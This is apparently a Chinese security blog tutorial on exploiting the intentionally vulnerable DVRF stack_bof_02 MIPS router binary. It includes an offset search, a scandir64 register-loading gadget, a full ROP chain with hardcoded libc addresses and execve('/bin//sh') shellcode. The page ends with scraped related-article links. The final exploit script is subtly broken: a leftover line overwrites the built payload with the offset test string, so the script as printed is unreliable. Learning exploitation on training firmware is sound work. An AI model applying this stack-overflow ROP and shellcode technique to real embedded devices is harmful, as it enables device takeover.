前言

本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274

这次程序也是 DVRF 里面的,他的路径是 pwnable/ShellCode_Required/stack_bof_02 , 同样是一个简单的栈溢出,不过这个程序里面没有提供 getshell 的函数,需要我们执行shellcode来实现。这个正好实战下前文: 一步一步pwn路由器之路由器环境修复&&rop技术分析,中分析的在mips下的通用的rop技术。

正文

首先使用 qemu 运行目标程序,并等待 gdb 来调试。

sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/ShellCode_Required/stack_bof_02  "`cat ./pwnable/Intro/input`"

使用pwntools的 cyclic 功能,找到偏移

验证一下:

payload = "A" * 508 + 'B' * 4

with open("input", "wb") as f:

    f.write(payload)

OK, 现在我们已经可以控制程序的 $pc寄存器了,下一步就是利用的方法了。使用前文的那个 rop 链,我们需要可以控制 $s1寄存器。但是这里我们并没有办法控制。不过在 这里提到,在 uclibcscandir 或者 scandir64 的函数末尾有一个 gadgets 可以操控几乎所有寄存器。

.text:0000AFE0                 lw      $ra, 0x40+var_4($sp)

.text:0000AFE4                 lw      $fp, 0x40+var_8($sp)

.text:0000AFE8                 lw      $s7, 0x40+var_C($sp)

.text:0000AFEC                 lw      $s6, 0x40+var_10($sp)

.text:0000AFF0                 lw      $s5, 0x40+var_14($sp)

.text:0000AFF4                 lw      $s4, 0x40+var_18($sp)

.text:0000AFF8                 lw      $s3, 0x40+var_1C($sp)

.text:0000AFFC                 lw      $s2, 0x40+var_20($sp)

.text:0000B000                 lw      $s1, 0x40+var_24($sp)

.text:0000B004                 lw      $s0, 0x40+var_28($sp)

.text:0000B008                 jr      $ra

.text:0000B00C                 addiu   $sp, 0x40

.text:0000B00C  # End of function scandir64

于是利用的思路就很明确了。首先使用这段 rop gadgets 设置好寄存器,然后进入前文所说的 rop 链中执行。

最后的poc如下:

#!/usr/bin/python

from pwn import *

context.endian = "little"

context.arch = "mips"

payload = ""

# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)

for i in range(30):

    payload += "\x26\x40\x08\x01"

# execve shellcode translated from MIPS to MIPSEL

# http://shell-storm.org/shellcode/files/shellcode-792.php

payload += "\xff\xff\x06\x28"  # slti $a2, $zero, -1

payload += "\x62\x69\x0f\x3c"  # lui $t7, 0x6962

payload += "\x2f\x2f\xef\x35"  # ori $t7, $t7, 0x2f2f

payload += "\xf4\xff\xaf\xaf"  # sw $t7, -0xc($sp)

payload += "\x73\x68\x0e\x3c"  # lui $t6, 0x6873

payload += "\x6e\x2f\xce\x35"  # ori $t6, $t6, 0x2f6e

payload += "\xf8\xff\xae\xaf"  # sw $t6, -8($sp)

payload += "\xfc\xff\xa0\xaf"  # sw $zero, -4($sp)

payload += "\xf4\xff\xa4\x27"  # addiu $a0, $sp, -0xc

payload += "\xff\xff\x05\x28"  # slti $a1, $zero, -1

payload += "\xab\x0f\x02\x24"  # addiu;$v0, $zero, 0xfab

payload += "\x0c\x01\x01\x01"  # syscall 0x40404

shellcode = payload

padding = "O" * 508

payload = padding

payload += p32(0x766effe0)

payload += 'B' * 0x18

payload += 'A' * 4  # $s0

payload += p32(0x7670303c)  # $s1

payload += 'A' * 4  # $s2

payload += 'A' * 4  # $s3

payload += 'A' * 4  # $s4

payload += 'A' * 4  # $s5

payload += 'A' * 4  # $s6

payload += 'A' * 4  # $s7

payload += 'A' * 4  # $fp

payload += p32(0x76714b10)  # $ra for jmp

# stack for gadget 2

payload += 'B' * 0x18

payload += 'A' * 4  # $s0

payload += p32(0x0002F2B0 + 0x766e5000)  # $s1

payload += 'A' * 4  # $s2

payload += p32(0x766fbdd0)  # $ra

# stack for gadget 2 for second

payload += 'B' * 0x18

payload += p32(0x767064a0)  # $s0  for jmp stack

payload += p32(0x0002F2B0 + 0x766e5000)  # $s1

payload += 'A' * 4  # $s2

payload += p32(0x766fbdd0)  # $ra for get stack addr

# stack for shellcode

payload += shellcode

payload = "A" * 508 + 'B' * 4

with open("input", "wb") as f:

    f.write(payload)

# base 0x766e5000

可以执行完毕 shellcode , 不过执行完后就异常了。神奇。

总结

在调试rop时可以先在调试器中修改寄存器,内存数据来模拟实现,然后在写到脚本里面。

参考链接:

https://www.pnfsoftware.com/blog/firmware-exploitation-with-jeb-part-2/

一步一步pwn路由器之rop技术实战的更多相关文章

  1. 一步一步pwn路由器之radare2使用实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 前文讲了一些 radare2 的特性相关的操作方法.本文以一个 c ...

  2. 一步一步pwn路由器之wr940栈溢出漏洞分析与利用

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 这个是最近爆出来的漏洞,漏洞编号:CVE-2017-13772 固 ...

  3. CTF必备技能丨Linux Pwn入门教程——ROP技术(下)

    Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程. 教程仅针对i386/am ...

  4. CTF必备技能丨Linux Pwn入门教程——ROP技术(上)

    Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程. 教程仅针对i386/am ...

  5. 一步一步pwn路由器之路由器环境修复&&rop技术分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 拿到路由器的固件后,第一时间肯定是去运行目标程序,一般是web服务 ...

  6. 一步一步pwn路由器之环境搭建

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 正式进入路由器的世界了.感觉路由器这块就是固件提取,运行环境修复比 ...

  7. 一步一步pwn路由器之radare2使用全解

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 radare2 最近越来越流行,已经进入 github 前 25了 ...

  8. 一步一步pwn路由器之栈溢出实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 本文以 DVRF 中的第一个漏洞程序 stack_bof_01 为 ...

  9. 一步一步pwn路由器之uClibc中malloc&&free分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 栈溢出告一段落.本文介绍下 uClibc 中的 malloc 和 ...

随机推荐

  1. JS中根据某个值进行大小排序

    //从大到小排序 function compareBigToSmall(property){ return function(a,b){ var value1 = a[property]; var v ...

  2. 洛谷 题解 P1225 【黑白棋游戏】

    看见很多dalao写了什么双向BFS,蒟蒻表示不会写啊. 怎么办办? 先来分析一下题目,一眼看去就是一个搜索题,考虑DFS与BFS. 先放一份DFS的代码: #include<bits/stdc ...

  3. MongoDB 正则表达式查询

    正则表达式查询     $regex 注:^ 取反的意思  用特殊的转义字符需要在前面加一个斜杠 通过 ^取反 ,再通过$not取反,就可获得只包含一种类型的数据 \\d  数字 \\s  空格 \\ ...

  4. 20191011-构建我们公司自己的自动化接口测试框架-Util的ClearData模块

    cleardata模块主要是用于在每次测试之前清除历史执行痕迹,主要代码如下: from Util.ParseExcel import * from ProVar.ProjConfigVar impo ...

  5. IntelliJ Idea基于Maven创建SpringMVC程序

    1. 创建Maven工程 网上很多资料,不再详细介绍,请参看IntelliJ IDEA 创建 hello world Java web Maven项目从头到尾都有图有真相2017版本 有关settin ...

  6. 5-6 c语言之【枚举,联合体,递归】

    今天学习了枚举,联合体,递归,重点在于递归,所以从网上找到了一些递归的题目进行练习,毕竟程序员界流传一句话,会用循环的是人,会用递归的是神,哈哈哈 还是按次序进行梳理,第一个枚举,枚举和宏定义很相似, ...

  7. element-ui获取用户选中项

    <el-table :data="tableData" stripe border style="width: 100%" @selection-chan ...

  8. Intercity Travelling CodeForces - 1009E (组合计数)

    大意: 有一段$n$千米的路, 每一次走$1$千米, 每走完一次可以休息一次, 每连续走$x$次, 消耗$a[1]+...+a[x]$的能量. 休息随机, 求消耗能量的期望$\times 2^{n-1 ...

  9. (十六)SpringBoot之使用 Caching- - EhCache

    一.案例 1.1 引入maven依赖 <!-- caching --> <dependency> <groupId>org.springframework.boot ...

  10. Linux 安装Mysql(图文教程)

    原文:Linux 安装Mysql(图文教程) 版权声明:本文为博主原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明. 本文链接:https://blog.csdn.net ...